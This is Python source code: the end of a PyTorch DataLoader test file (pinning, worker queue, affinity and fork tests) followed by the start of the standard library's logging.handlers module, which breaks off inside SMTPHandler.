self.inp = self.inp.pin_memory()
self.tgt = self.tgt.pin_memory()
return self
def is_pinned(self):
return self.inp.is_pinned() and self.tgt.is_pinned()
# Workaround for https://github.com/pytorch/pytorch/issues/50661
# Classes from `__main__` can not be correctly unpickled from spawned module
# See https://docs.python.org/3/library/multiprocessing.html#multiprocessing-programming
self_module = __import__(os.path.splitext(os.path.basename(__file__))[0])
def collate_wrapper(batch):
return self_module.SimpleCustomBatch(batch)
def collate_into_packed_sequence(batch):
data = torch.stack([sample[0] for sample in batch], 1)
t, b = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, enforce_sorted=False)
def collate_into_packed_sequence_batch_first(batch):
data = torch.stack([sample[0] for sample in batch], 0)
b, t = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, batch_first=True, enforce_sorted=False)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestCustomPinFn(TestCase):
def setUp(self):
super(TestCustomPinFn, self).setUp()
inps = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
tgts = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
self.dataset = TensorDataset(inps, tgts)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin_worker(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True, num_workers=1)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"Flaky with ASAN, see https://github.com/pytorch/pytorch/issues/65727")
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
super(TestIndividualWorkerQueue, self).setUp()
self.dataset = TestWorkerQueueDataset(list(range(128)))
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
timeout=5, worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), list(range(i * batch_size, (i + 1) * batch_size)))
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
def test_ind_worker_queue(self):
max_num_workers = None
if hasattr(os, 'sched_getaffinity'):
try:
max_num_workers = len(os.sched_getaffinity(0))
except Exception:
pass
if max_num_workers is None:
cpu_count = os.cpu_count()
if cpu_count is not None:
# Use half number of CPUs
max_num_workers = cpu_count // 2
if max_num_workers is None:
max_num_workers = 1
for batch_size in (8, 16, 32, 64):
for num_workers in range(0, min(6, max_num_workers)):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers + 1)
class SetAffinityDataset(IterableDataset):
def __iter__(self):
torch.randperm(1)
after = os.sched_getaffinity(0)
return iter(after)
def worker_set_affinity(_):
os.sched_setaffinity(0, [multiprocessing.cpu_count() - 1])
@unittest.skipIf(
not hasattr(os, 'sched_setaffinity'),
"os.sched_setaffinity is not available")
class TestSetAffinity(TestCase):
def test_set_affinity_in_worker_init(self):
dataset = SetAffinityDataset()
dataloader = torch.utils.data.DataLoader(
dataset, num_workers=2, worker_init_fn=worker_set_affinity)
for sample in dataloader:
self.assertEqual(sample, [multiprocessing.cpu_count() - 1])
class ConvDataset(Dataset):
def __init__(self):
self.x = torch.ones(1, 1, 24000)
# Call convolution on parent process
self[0]
def __len__(self):
return 1
def __getitem__(self, index):
return torch.nn.functional.conv1d(self.x, torch.ones(1, 1, 2))
@unittest.skipIf(IS_WINDOWS, "Needs fork")
class TestConvAfterFork(TestCase):
# Tests crash reported in https://github.com/pytorch/pytorch/issues/53565
def test_conv_after_fork(self):
loader = DataLoader(ConvDataset(), num_workers=1)
for x in loader:
self.assertEqual(x.shape, (1, 1, 1, 23999))
if __name__ == '__main__':
run_tests()
|
handlers.py | # Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
try:
import threading
except ImportError: #pragma: no cover
threading = None
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def emit(self, record):
"""
Emit a record.
First check if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
self._connect_unixsocket(address)
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_INET, socktype)
if socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.socktype = socktype
self.formatter = None
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close (self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
